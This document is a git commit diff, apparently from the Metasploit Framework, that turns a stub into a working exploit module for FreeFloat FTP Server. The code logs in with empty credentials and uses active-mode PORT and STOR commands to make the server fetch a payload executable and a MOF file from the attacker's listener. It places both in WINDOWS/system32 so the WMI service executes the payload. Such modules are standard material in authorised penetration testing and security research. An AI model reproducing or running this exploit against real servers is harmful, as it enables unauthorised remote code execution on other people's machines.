working...

jvazquez-r7 · jvazquez-r7 · commit bae5442ca61b · 2012-12-07T21:38:17.000+01:00
diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb
@@ -11,20 +11,24 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::Ftp
-	include Msf::Exploit::WbemExec
+	include Msf::Exploit::Remote::TcpServer
 	include Msf::Exploit::EXE
+	include Msf::Exploit::WbemExec
+	include Msf::Exploit::FileDropper
 
 	def initialize(info={})
 		super(update_info(info,
 			'Name'           => "FreeFloat FTP Server Arbitrary File Upload",
 			'Description'    => %q{
-				Scre buffer overflows. FreeFloat allows remote user to upload anywhere on the file system.  Win!
+					This module abuses a lack of authentication and authorization on FreeFloat FTP
+				Server to upload arbitrary files to the remote filesystem. This module uses the
+				Windows Management Instrumentation service to execute the payload uploaded.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'juan vazquez',
-					'sinn3r'
+					'sinn3r', # Vulnerability discovery, Metasploit module
+					'juan vazquez' # Metasploit module
 				],
 			'References'     =>
 				[
@@ -35,11 +39,20 @@ def initialize(info={})
 				[
 					['FreeFloat', {}],
 				],
-			'Privileged'     => false,
-			'DisclosureDate' => "Apr 1 2012",
+			'Privileged'     => true,
+			'DisclosureDate' => "Dec 7 2012",
 			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				# Change the default description so this option makes sense
+				OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
+			], self.class)
+
+		deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password
 	end
 
+
 	def check
 		connect
 		disconnect
@@ -52,23 +65,93 @@ def check
 		end
 	end
 
-	def peer
-		"#{rhost}:#{rport}"
+
+	def on_client_connect(cli)
+		peer = "#{cli.peerhost}:#{cli.peerport}"
+
+		case @stage
+		when :exe
+			print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)")
+			cli.put(@exe)
+			@stage = :mof
+
+		when :mof
+			print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)")
+			cli.put(@mof)
+		end
+
+		cli.close
 	end
 
-	def exploit
-		print_status("#{peer} - Generating payload...")
-		exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
-		exe      = generate_payload_exe
-		mof_name = Rex::Text::rand_text_alpha(5) + ".mof"
-		mof      = generate_mof(mof_name, exe_name)
 
-		connect
+	def upload(filename)
+		select(nil, nil, nil, 1)
 
-		print_status("#{peer} - Uploading '{exe_name}'")
+		peer = "#{rhost}:#{rport}"
+		print_status("#{peer} - Trying to upload #{::File.basename(filename)}")
 
-		print_status("#{peer} - Uploading '#{mof_name}'")
+		conn = connect(false, datastore['VERBOSE'])
 
-		disconnect
+		print_status("#{peer} - Sending empty login...")
+
+		res = send_user("", conn)
+		if not res or res !~ /331/
+			print_error("#{peer} - Error sending username")
+			return false
+		end
+
+		res = send_pass("", conn)
+		if not res or res !~ /230/
+			print_error("#{peer} - Error sending password")
+			return false
+		end
+
+		print_good("#{peer} - Empty authentication was successful")
+
+		# Switch to binary mode
+		print_status("#{peer} - Set binary mode")
+		send_cmd(['TYPE', 'I'], true, conn)
+
+		# Prepare active mode: Get attacker's IP and source port
+		src_ip   = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+		src_port = datastore['SRVPORT'].to_i
+
+		# Prepare active mode: Convert the IP and port for active mode
+		src_ip   = src_ip.gsub(/\./, ',')
+		src_port = "#{src_port/256},#{src_port.remainder(256)}"
+
+		# Set to active mode
+		print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
+		send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)
+
+		# Tell the FTP server to download our file
+		send_cmd(['STOR', filename], false, conn)
+
+		disconnect(conn)
 	end
-end
+
+
+	def exploit
+
+		exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10)+5)}.exe"
+		mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"
+		@mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
+		@exe      = generate_payload_exe
+		@stage = :exe
+
+		begin
+			t = framework.threads.spawn("reqs", false) {
+				# Upload our malicious executable
+				u = upload(exe_name)
+				# Upload the mof file
+				upload(mof_name) if u
+				register_file_for_cleanup("#{::File.basename(exe_name)}")
+				register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
+			}
+			super
+		ensure
+			t.kill
+		end
+	end
+
+end
